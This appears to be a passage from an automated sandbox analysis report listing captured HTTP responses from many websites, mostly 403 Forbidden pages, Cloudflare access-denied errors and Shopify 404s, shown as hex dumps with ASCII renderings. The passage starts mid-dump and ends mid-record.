65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 05 Jul 2023 06:05:49 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:05:53 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:05:53 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 05 Jul 2023 06:05:48 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:05:55 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tlUhpwE%2FBQd9tbI9wrKPw5qURxoV7qVgtcMh6lGggD0Qm6jEwr8VbCMz%2FzUmdC%2BXIOT7%2BnWLNn3KIUmft31Va2PSCONOTIQ1V46H29p0K58fI3CdEgBHk8RORNzJzcWu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6b4649709bb2-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:05:55 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k13mc0bMa504yPACEguA5qrDBqAX0fGLIBPJiNPNwmODrpT7%2FD9UMbGY5hE23mCrFtAtC7MPrZ%2FuscUAL17mTlnXj2vmOuHi7T%2B1OdsIWTMy12irpqX%2FPg9nKoco0%2BgP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6b46ea0a9bb2-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:05:57 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6iTm3MDWdV87IUCMNoR0Oge5DIgpxgbfPJlaTSRGRZO0sY0vSlyB8xZqAfmhe8Cjrgt4aaSeunGk3EEJ4T84U57zex4u%2BQ0SLwDVPvwrIz3zymsXcVx792N2rh8bAkBp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6b518dc22be6-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:05:57 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0sTZU8NhF3XcqtaSFrQpcw%2BUFrB1cCAiE0PqoajdDkDtpO8iorhP6NaOchle2AATDDmouF9qrvOA0UnJvrvSFSFwbLQC%2BHnObjmMa%2BjromiLnX9Vzjdt0BZNoZHrWUZF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6b51bde62be6-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Wed, 05 Jul 2023 06:05:58 GMTX-Cache-Status: X-Zen-Fury: bfe1c91319a166fa4323b17e765b5a163bf1512fData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 33 30 37 34 22 2c 20 31 36 38 38 35 33 37 31 35 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 38 38 35 33 37 31 35 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 37 31 33 39 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 30 35 20 4a 75 6c 20 32 30 32 33 20 30 36 3a 30 37 3a 35 38 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC3074", 1688537158, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1688537158 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:05:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:06:13 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ctGxlEPR62BlAdI32avBnoXt6SPevK%2BKrKxO5eChDIG5P0sXwlVAJoyX8j5ZooZR%2FoE0u8Ao8lIbe6VyIRxEyolu%2BBDs6%2B2ZEbRx56UbgsdPWSOcWX3iq9OqB0gCGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7e1d6b59ca32bb91-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 Data Ascii: 119c<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compa
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:05:58 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfWOotv7Qhr82RarQR/hsnp,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1688537158.8763045314421992X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:06:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=17X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: df9765ee-8f4e-46ec-9092-11fdad06f800CF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=KrpZpH2LWSmhErUxPF2gyuBsotJc3LGsP0.8r4fMkSI-1688537160-0-ATZQ5sZaxL9V7VdLA+droG3Wot6+wIDTr0pfoxJDGJxMGIRCwZNUYR/itiI3IG+WFhtXcUH/BWDu72U4Y+Y1yMk=; path=/; expires=Wed, 05-Jul-23 06:36:00 GMT; domain=.www.snugpak.com; HttpOnly; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sLEqfxNxP5WswZ5booeYjAY7SL7UeTWcelLk7LP%2F1O0Q2r%2FExYpnI0%2FbvsuxSB9ZgZU2aM%2BP434t2rm61pXRZ01JipE%2FyqWxiOVXwxm8yV9fWEUHDVCZae1QJWrWDsYDKQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=142.999887Server: cloudflareCF-RAY: 7e1d6b62ce676921-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:11 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:11 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:06:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=17X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: cee9aa53-df36-4942-a346-96f1e74d7810CF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=bG7aGS9BVVg0sRmxAgVEHshxh_IUaylULZnnrKAZthw-1688537177-0-Ad2ypDuBBLd93obDicSBXDOOQyPU7Psl9Aylem5rntUccmgjEu7zZ4vGUse61szb3qyCxcMNQXOXcHQ8/uNp0b0=; path=/; expires=Wed, 05-Jul-23 06:36:17 GMT; domain=.www.domon.com; HttpOnly; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VNGQV0vRxI0oyNzYS7xQJNAWsqxXJTuatAok4zuE1PXpKnyoM%2B30iSw%2BJb7EeT4Ogo%2B1SUsfSUlnr9Qv%2BzEkq%2FZRHQpSoy6e1dz6j3YGfPDDZIbXs2Pyao8x2sWaYPU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=150.000095Server: cloudflareCF-RAY: 7e1d6bcd3e565b38-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:23 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dZcj%2BfSx2cnLQzysAuULDHEK5Oh95xosFgGgAgBKXdNn8M2KSeSAXDDKthz742L7IVNBDPr6E1WsiQPu1OGRr1TyUN9TBIsiXMy0MrrAnvZiB4B5GrEkcv%2BSkY6IEIo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 